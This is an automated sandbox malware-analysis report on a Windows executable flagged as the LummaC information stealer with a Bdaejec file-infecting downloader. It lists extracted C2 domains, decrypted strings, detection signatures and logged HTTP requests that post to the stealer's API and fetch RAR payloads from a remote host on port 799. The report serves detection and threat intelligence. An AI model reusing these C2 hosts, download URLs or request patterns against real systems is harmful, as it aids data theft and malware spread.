Edit tour

Windows Analysis Report
current[1].exe

Overview

General Information

Sample name:	current[1].exe
Analysis ID:	1480805
MD5:	cd7329155530fb805abb2cace9b32134
SHA1:	a73cd6bb4b42e19756d56289324787b562b07225
SHA256:	ab58f2c394aead605975f0ef099f51af8c5a70d2ecfeac3710cb5905409d03f2
Tags:	exe
Infos:

Detection

LummaC, Bdaejec, LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected Bdaejec

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Infects executable files (exe, dll, sys, html)

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

PE file has a writeable .text section

Sample uses string decryption to hide its real strings

Uses known network protocols on non-standard ports

AV process strings found (often used to terminate AV products)

Contains functionality to call native functions

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara signature match

Classification

Process Tree

System is w10x64

current[1].exe (PID: 7436 cmdline: "C:\Users\user\Desktop\current[1].exe" MD5: CD7329155530FB805ABB2CACE9B32134)

jJEAWO.exe (PID: 7452 cmdline: C:\Users\user\AppData\Local\Temp\jJEAWO.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)

WerFault.exe (PID: 7648 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1624 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 8096 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1504 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["sofahuntingslidedine.shop", "culturesketchfinanciall.shop", "triangleseasonbenchwj.shop", "modestessayevenmilwek.shop", "liabilityarrangemenyit.shop", "claimconcessionrebe.shop", "secretionsuitcasenioise.shop", "gemcreedarticulateod.shop", "sofahuntingslidedine.shop"], "Build id": "P6Mk0M--key"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2053042174.000000000082E000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: current[1].exe PID: 7436	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Process Memory Space: jJEAWO.exe PID: 7452	JoeSecurity_Bdaejec	Yara detected Bdaejec	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (sofahuntingslidedine .shop) - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T00:25:48.931176+0200
SID:	2050569
Source Port:	62562
Destination Port:	53
Protocol:	UDP
Classtype:	Domain Observed Used for C2 Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup - Source IP: 192.168.2.4 - Destination IP: 1.1.1.1

Timestamp:	2024-07-25T00:25:46.594927+0200
SID:	2838522
Source Port:	53900
Destination Port:	53
Protocol:	UDP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T00:25:51.713349+0200
SID:	2807908
Source Port:	49733
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.4

Timestamp:	2024-07-25T00:26:05.795110+0200
SID:	2022930
Source Port:	443
Destination Port:	49745
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T00:25:50.257064+0200
SID:	2028371
Source Port:	49732
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.4 - Destination IP: 13.89.179.12

Timestamp:	2024-07-25T00:26:23.945099+0200
SID:	2028371
Source Port:	49747
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T00:25:49.613567+0200
SID:	2054653
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 13.85.23.86 - Destination IP: 192.168.2.4

Timestamp:	2024-07-25T00:26:43.318154+0200
SID:	2022930
Source Port:	443
Destination Port:	49748
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Lumma Stealer CnC Host Checkin - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T00:26:20.886285+0200
SID:	2054653
Source Port:	49732
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin - Source IP: 192.168.2.4 - Destination IP: 44.221.84.105

Timestamp:	2024-07-25T00:25:47.104617+0200
SID:	2807908
Source Port:	49730
Destination Port:	799
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.4 - Destination IP: 52.168.117.173

Timestamp:	2024-07-25T00:26:04.945224+0200
SID:	2028371
Source Port:	49744
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET JA3 Hash - Possible Malware - Fake Firefox Font Update - Source IP: 192.168.2.4 - Destination IP: 188.114.96.3

Timestamp:	2024-07-25T00:25:49.436763+0200
SID:	2028371
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: current[1].exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ddos.dnsnb8.net:799/cj//k2.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar	URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManagerA	Avira URL Cloud: Label: phishing
Source: triangleseasonbenchwj.shop	Avira URL Cloud: Label: phishing
Source: sofahuntingslidedine.shop	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarh?	Avira URL Cloud: Label: malware
Source: modestessayevenmilwek.shop	Avira URL Cloud: Label: malware
Source: https://sofahuntingslidedine.shop/api	Avira URL Cloud: Label: phishing
Source: secretionsuitcasenioise.shop	Avira URL Cloud: Label: phishing
Source: https://sofahuntingslidedine.shop/	Avira URL Cloud: Label: phishing
Source: https://sofahuntingslidedine.shop/u	Avira URL Cloud: Label: phishing
Source: gemcreedarticulateod.shop	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarp	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rark	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarE0	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarm	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarT	Avira URL Cloud: Label: phishing
Source: https://sofahuntingslidedine.shop/apik	Avira URL Cloud: Label: phishing
Source: culturesketchfinanciall.shop	Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k1.rarcC:	Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarN	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe	Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Avira: detection malicious, Label: W32/Jadtre.B

Found malware configuration

Source: 0.2.current[1].exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["sofahuntingslidedine.shop", "culturesketchfinanciall.shop", "triangleseasonbenchwj.shop", "modestessayevenmilwek.shop", "liabilityarrangemenyit.shop", "claimconcessionrebe.shop", "secretionsuitcasenioise.shop", "gemcreedarticulateod.shop", "sofahuntingslidedine.shop"], "Build id": "P6Mk0M--key"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: current[1].exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sofahuntingslidedine.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: culturesketchfinanciall.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: triangleseasonbenchwj.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: modestessayevenmilwek.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: liabilityarrangemenyit.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: claimconcessionrebe.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: secretionsuitcasenioise.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: gemcreedarticulateod.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: sofahuntingslidedine.shop
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2052886142.0000000000740000.00000040.00001000.00020000.00000000.sdmp	String decryptor: P6Mk0M--key

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\current[1].exe

Unpacked PE file: 0.2.current[1].exe.400000.0.unpack

Source: current[1].exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\current[1].exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2

Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source:	Binary string: .C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe
Source:	Binary string: C:\yatafekubigu\xegoh\kegokececana\hobof.pdb source: current[1].exe

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E929E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,

1_2_00E929E2

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E92B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00E92B8C

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax	0_2_00462440
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then inc edi	0_2_004238A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00427139
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0042A182
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0042A190
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00428251
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0044A22D
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp ecx	0_2_00461236
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp ecx	0_2_00461234
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00448B92
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov esi, ecx	0_2_004143C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp al, 2Eh	0_2_00445430
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00430480
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]	0_2_0045C480
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [esi+2Ch]	0_2_00430565
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp esi	0_2_00461516
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then lea eax, dword ptr [edi+04h]	0_2_004305F1
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0042D639
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then test eax, eax	0_2_004596F2
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then xor ebx, ebx	0_2_0042A732
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, edx	0_2_0041E7C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_004387C0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_004387BB
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp ecx	0_2_00460846
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0042B802
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00445807
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [edx-08h], edi	0_2_00464800
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0042A805
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0042AB0E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_004458D7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_004458F2
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_004478BD
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00447947
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00447962
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov edi, C6989171h	0_2_0042B913
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax	0_2_0042E920
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [00475144h]	0_2_0043C990
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then push dword ptr [esi+4Ch]	0_2_00445A02
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax	0_2_0045CA90
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [edx], bl	0_2_00425C07
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then movzx esi, word ptr [ecx+eax*4]	0_2_0041CD30
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then movzx ebx, byte ptr [edx+edi]	0_2_00401EE0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [0047E78Ch]	0_2_0045FEE3
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_0042FF6C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [0047E78Ch]	0_2_0045FEE3
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	0_2_00429F35
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then movzx ebx, byte ptr [edx+edi]	0_2_00742147
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_007701D3
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	0_2_0076A19C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0076A3F7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0076A3E9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_007673A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_007684B8
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0078A494
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00788DF9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov esi, ecx	0_2_00754627
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_007706E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]	0_2_0079C6E7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax	0_2_007A26A7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp al, 2Eh	0_2_00785697
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [esi+2Ch]	0_2_007707CC
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then lea eax, dword ptr [edi+04h]	0_2_00770858
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0076D8A0
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then test eax, eax	0_2_00799959
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then xor ebx, ebx	0_2_0076A999
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0076AD75
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00785A73
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0076AA6C
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [edx-08h], edi	0_2_007A4A67
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_0076BA69
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00778A27
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, edx	0_2_0075EA27
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00778A22
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [esi+000000B8h]	0_2_00769ABD
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov edi, C6989171h	0_2_0076BB7A
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00785B59
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00785B3E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00787B24
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then inc edi	0_2_00763B07
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov eax, dword ptr [00475144h]	0_2_0077CBF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00787BC9
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then jmp eax	0_2_00787BAE
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax	0_2_0076EB87
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then push dword ptr [esi+4Ch]	0_2_00785C69
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then cmp dword ptr [ecx], eax	0_2_0079CCF7
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then mov byte ptr [edx], bl	0_2_00765E6E
Source: C:\Users\user\Desktop\current[1].exe	Code function: 4x nop then movzx esi, word ptr [ecx+eax*4]	0_2_0075CF97

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: sofahuntingslidedine.shop
Source: Malware configuration extractor	URLs: culturesketchfinanciall.shop
Source: Malware configuration extractor	URLs: triangleseasonbenchwj.shop
Source: Malware configuration extractor	URLs: modestessayevenmilwek.shop
Source: Malware configuration extractor	URLs: liabilityarrangemenyit.shop
Source: Malware configuration extractor	URLs: claimconcessionrebe.shop
Source: Malware configuration extractor	URLs: secretionsuitcasenioise.shop
Source: Malware configuration extractor	URLs: gemcreedarticulateod.shop
Source: Malware configuration extractor	URLs: sofahuntingslidedine.shop

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 799

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799

Source: Joe Sandbox View	IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sofahuntingslidedine.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=_2SNjID_zmQ4tMLgutu16zJ8STSYOqYvGDcmnrSWpYo-1721859949-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sofahuntingslidedine.shop
Source: global traffic	HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\Temp\jJEAWO.exe

Code function: 1_2_00E91099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,

1_2_00E91099

